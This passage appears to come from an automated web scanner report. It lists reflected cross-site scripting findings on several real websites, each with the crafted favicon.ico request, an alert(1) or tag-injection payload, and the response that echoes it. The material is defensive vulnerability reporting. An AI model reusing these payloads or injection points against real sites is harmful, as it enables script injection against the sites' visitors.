ch.this_url = 'http://www.collegehumor.com/favicon.ico?e1307'-alert(1)-'314d4297df=1';
ch.this_url_64 = 'aHR0cDovL3d3dy5jb2xsZWdlaHVtb3IuY29tL2Zhdmljb24uaWNvP2UxMzA3Jy1hbGVydCgxKS0nMzE0ZDQyOTdkZj0x';
ch.home_url = 'http://www.collegehumor.com';
ch.user_id = 0
...[SNIP]...
6.31. http://www.craveonline.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.craveonline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3b192--><a>42b747ad359 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico3b192--><a>42b747ad359 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craveonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2
Status: 404 Not Found
Expires: Sat, 02 Apr 2011 14:25:35 GMT
Cache-Control: public, max-age=300
Vary: Accept-Encoding
X-Served-By: app1v-fe.sb.lax1
Content-Type: text/html; charset=UTF-8
Content-Length: 56159
Date: Sat, 02 Apr 2011 14:20:35 GMT
X-Varnish: 878005268
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS from pxy1v.sb.lax1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<!-- page created on - 12-03-10, 08:52:39 -->
<!-- $Id: pagegen.php 2816 2009-06-25 1
...[SNIP]...
<!-- BEGIN GN Ad Tag for Craveonline 1000x1000 favicon.ico3b192--><a>42b747ad359 -->
...[SNIP]...
6.32. http://www.craveonline.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craveonline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88a67'-alert(1)-'dd8390ff089 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico88a67'-alert(1)-'dd8390ff089 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craveonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2
Status: 404 Not Found
Expires: Sat, 02 Apr 2011 14:25:32 GMT
Cache-Control: public, max-age=300
Vary: Accept-Encoding
X-Served-By: app2v-fe.sb.lax1
Content-Type: text/html; charset=UTF-8
Content-Length: 56303
Date: Sat, 02 Apr 2011 14:20:32 GMT
X-Varnish: 878005112
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS from pxy1v.sb.lax1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<!-- page created on - 12-03-10, 08:52:39 -->
<!-- $Id: pagegen.php 2816 2009-06-25 1
...[SNIP]...
<scr'+'ipt language="JavaScript" src="http://n4403ad.doubleclick.net/adj/gn.cr.craveonline.com/favicon.ico88a67'-alert(1)-'dd8390ff089;sect=favicon.ico88a67'-alert(1)-'dd8390ff089;ct=favicon.ico88a67'-alert(1)-'dd8390ff089;ci=;sz=1000x1000;tile='+(gnm_tile++)+';ord=' + gnm_ord + '?">
...[SNIP]...
6.33. http://www.csmonitor.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6502"-alert(1)-"527e231a44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d6502"-alert(1)-"527e231a44 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.csmonitor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Sat, 02 Apr 2011 13:27:22 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86384
Expires: Sun, 03 Apr 2011 13:27:07 GMT
Date: Sat, 02 Apr 2011 13:27:23 GMT
Content-Length: 21591
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/d6502"-alert(1)-"527e231a44";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...
6.34. http://www.docstoc.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.docstoc.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d5f5'-alert(1)-'7263aba8059 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico9d5f5'-alert(1)-'7263aba8059 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.docstoc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Set-Cookie: user_guid=1a45ceec-1c83-4750-a66d-bb53ea4fe27b; expires=Fri, 02-Apr-2021 13:31:59 GMT; path=/
Set-Cookie: first_time=1; domain=docstoc.com; path=/
Set-Cookie: session.docstoc.sourceinfo={"Source":"","Medium":"Direct","Term":"","Campaign":"","Content":""}; path=/
Set-Cookie: session.docstoc.seo={"Term":"","SEPage":"","SEType":""}; path=/
Set-Cookie: session.docstoc.source={"Refer":"","IP":"173.193.214.243","Country":"US","UA":"curl%2f7.21.0+(amd64-pc-win32)+libcurl%2f7.21.0+OpenSSL%2f0.9.8o+zlib%2f1.2.3"}; path=/
Set-Cookie: geoinfo.docstoc={"WorldRegionCode":1,"WorldRegionName":"United States","CountryCode":"US","CountryName":"United States","Region":"TX","City":"Dallas","Latitude":32.782501220703125,"Longitude":-96.8207015991211}; path=/
Set-Cookie: session.docstoc=d10a866a-2296-4f61-9582-da96250ad728; path=/
Set-Cookie: memguid.docstoc=811a77f3-6db6-4f0f-9360-a701e8733536; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: fingerprint.docstoc={"FingerprintId":"","DMA":"","City":"","Region":"","Country":"","Fonts":"","Plugins":"","UserAgent":"","IpAddress":"","Resolution":""}; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: pages_visited=1; path=/
Set-Cookie: general=showTopIE9=1,1,4/3/2011 6:31:59 AM; domain=docstoc.com; expires=Mon, 02-Apr-2012 13:31:59 GMT; path=/
Set-Cookie: cartItemCount=0; expires=Mon, 02-May-2011 13:31:59 GMT; path=/
serverID: www2
Date: Sat, 02 Apr 2011 13:31:58 GMT
Content-Length: 15433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:media="http://search.
...[SNIP]...
insertBefore(ga, s);
})();
var redirectUrl='/login/FacebookLogin.aspx?returnURL=http%3a%2f%2fwww.docstoc.com%2fPageNotFound%2fPageNotFound.aspx%3f404%3bhttp%3a%2f%2fwww.docstoc.com%3a80%2ffavicon.ico9d5f5'-alert(1)-'7263aba8059';
_qoptions={qacct:"p-07Zpl6-aPXQAI"};
</script>
...[SNIP]...
6.35. http://www.domaintools.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c8b31<a>cfeca55b272 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /c8b31<a>cfeca55b272 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.domaintools.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sat, 02 Apr 2011 14:45:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:45:19 GMT
Content-Length: 11939
Connection: close
Set-Cookie: dtsession=0c96c752b97d8eeab552cf2acdcba16d; expires=Tue, 30 Mar 2021 13:45:19 GMT; path=/; domain=.domaintools.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>cfeca55b272">Whois record for "c8b31<a>cfeca55b272"</a>
...[SNIP]...
6.36. http://www.driverside.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.driverside.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27027"-alert(1)-"893baf0fdc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico27027"-alert(1)-"893baf0fdc8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.driverside.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:39:11 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: SelectedCarID=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Set-Cookie: SelectedTrimID=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Set-Cookie: SelectedStyleID=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Set-Cookie: TplType=2; expires=Mon, 09-May-2011 01:39:12 GMT; path=/
Set-Cookie: Ds_client=ed826f9ef3019c3a25abefb6fd651b0d; expires=Tue, 30-Mar-2021 13:39:12 GMT; path=/
Set-Cookie: UUID=DS-7fa5332a-91f8-76bb-ffa3-9ec63b1c8a2c; expires=Tue, 30-Mar-2021 13:39:12 GMT; path=/
Set-Cookie: business_id=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Set-Cookie: partner_id=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Conten
...[SNIP]...
<!--

/* Copyright 1997-2004 Omniture, Inc. */
s.prop1="DS";
s.prop2="Sat";
s.prop3="06";
s.prop7="/favicon.ico27027"-alert(1)-"893baf0fdc8";
s.prop15="unregistered";
s.prop16="logged out";
s.prop17="non-member";
s.eVar1="DS";
s.eVar12="Sat";
s.eVar13="06";
s.eVar15="unregistered";
s.eVar16="logged out";
s.eVar17="non-member";
s.zip=""
/*
...[SNIP]...
6.37. http://www.education.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.education.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2a97"%3b06af93cafcd was submitted in the REST URL parameter 1. This input was echoed as d2a97";06af93cafcd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icod2a97"%3b06af93cafcd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.education.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 02 Apr 2011 13:35:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Set-Cookie: e=fhkbhen0kd9vs4jlqhf6ju3g10; expires=Sat, 02-Apr-2011 23:35:10 GMT; path=/; domain=www.education.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: i=0; expires=Tue, 14-Jun-2011 13:35:10 GMT; path=/
Content-Length: 140381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
   <head>
       <meta http-equiv="co
...[SNIP]...
<!--if(!s.pageName) s.pageName="Education.com | An Education & Child Development Site for Parents | Parenting & Educational Resource";
s.pageType="errorPage";
if(!s.channel) s.channel="favicon.icod2a97";06af93cafcd";
s.prop5=Cookie.get('registered');
s.prop6=0;
s.prop7='organic';
s.eVar15='organic';
s.prop13='Home Page';
s.prop17='none';
s.campaign='';
s.prop18='web00';
if(Cookie.read&&Cookie.read('sevent', {pat
...[SNIP]...
6.38. http://www.egotastic.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.egotastic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15911"><a>dcba971d871 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico15911"><a>dcba971d871 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.egotastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:44:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 126517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<input type="hidden" name="GBORGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZWWWHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO15911"><A>DCBA971D871EDTHR2WGPMZ0400HR2WGPMZ14400" id="GBORGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZWWWHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO15911">
...[SNIP]...
6.39. http://www.egotastic.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.egotastic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4bbdc<script>alert(1)</script>7e8efe51f47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4bbdc<script>alert(1)</script>7e8efe51f47 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.egotastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:44:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 126726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<p>The page you are looking for: "http://www.egotastic.com/favicon.ico4bbdc<script>alert(1)</script>7e8efe51f47" seems to be missing.</p>
...[SNIP]...
6.40. http://www.elyrics.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyrics.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7526b<script>alert(1)</script>c49fd957cea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7526b<script>alert(1)</script>c49fd957cea HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyrics.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:36:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1173
Content-Type: text/html

<html>
<head><title>Page not Found on elyrics.net</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
</head>
<body><h1>Error 404 Page not Found</h1>
   <a href="/"><img src="http://a527.ac-images.
...[SNIP]...
<font color=red>/favicon.ico7526b<script>alert(1)</script>c49fd957cea</font>
...[SNIP]...
6.41. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 66975</title><script>alert(1)</script>b548febdb4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico66975</title><script>alert(1)</script>b548febdb4d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:08 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1419
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico66975</title><script>alert(1)</script>b548febdb4d not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{
...[SNIP]...
6.42. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4097f<script>alert(1)</script>ca01e159581 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4097f<script>alert(1)</script>ca01e159581 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:08 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1403
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico4097f<script>alert(1)</script>ca01e159581 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{
   fo
...[SNIP]...
<h1>/favicon.ico4097f<script>alert(1)</script>ca01e159581 not found on elyricsworld.com</h1>
...[SNIP]...
6.43. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 4ae7d</title><script>alert(1)</script>1082cba203e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?4ae7d</title><script>alert(1)</script>1082cba203e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:04 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1425
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico?4ae7d</title><script>alert(1)</script>1082cba203e=1 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body

...[SNIP]...
6.44. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 48892<script>alert(1)</script>4686b36e033 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?48892<script>alert(1)</script>4686b36e033=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:03 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1409
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico?48892<script>alert(1)</script>4686b36e033=1 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{

...[SNIP]...
<h1>/favicon.ico?48892<script>alert(1)</script>4686b36e033=1 not found on elyricsworld.com</h1>
...[SNIP]...
6.45. http://www.everydayhealth.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc61f'%3bd646a62950f was submitted in the REST URL parameter 1. This input was echoed as cc61f';d646a62950f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icocc61f'%3bd646a62950f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.everydayhealth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 File Not Found
Date: Sat, 02 Apr 2011 13:27:14 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB07
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=Acwny4THb9g0MzViZGNkYi0xYTc0LTQxYTEtOGNlYy1jMjZhMDg0NDQ3NGM1; expires=Sat, 11-Jun-2011 00:07:14 GMT; path=/
Set-Cookie: ASP.NET_SessionId=kijeui555z3zjjmaqxna4s55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/favicon.icocc61f';d646a62950f', c5: '', c6: '', c15: ''});</script>
...[SNIP]...
6.46. http://www.gamespot.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamespot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cd8"><script>alert(1)</script>0043b9c4893 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico95cd8"><script>alert(1)</script>0043b9c4893 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamespot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:27:07 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Mon, 02-May-2011 13:27:07 GMT; path=/; domain=.gamespot.com
Set-Cookie: ctk=NGQ5NzI0MmJhZGMxZDZmM2I2YzQ0ZDQ4NzY1ZQ%3D%3D; expires=Thu, 29-Sep-2011 13:27:07 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_040211=1; expires=Tue, 05-Apr-2011 13:27:07 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34823


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.gamespot.com/favicon.ico95cd8"><script>alert(1)</script>0043b9c4893" />
...[SNIP]...
6.47. http://www.gamestop.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 599e8'a%3d'b'629f0608bc6 was submitted in the REST URL parameter 1. This input was echoed as 599e8'a='b'629f0608bc6 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico599e8'a%3d'b'629f0608bc6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamestop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:33:25 GMT
Connection: close
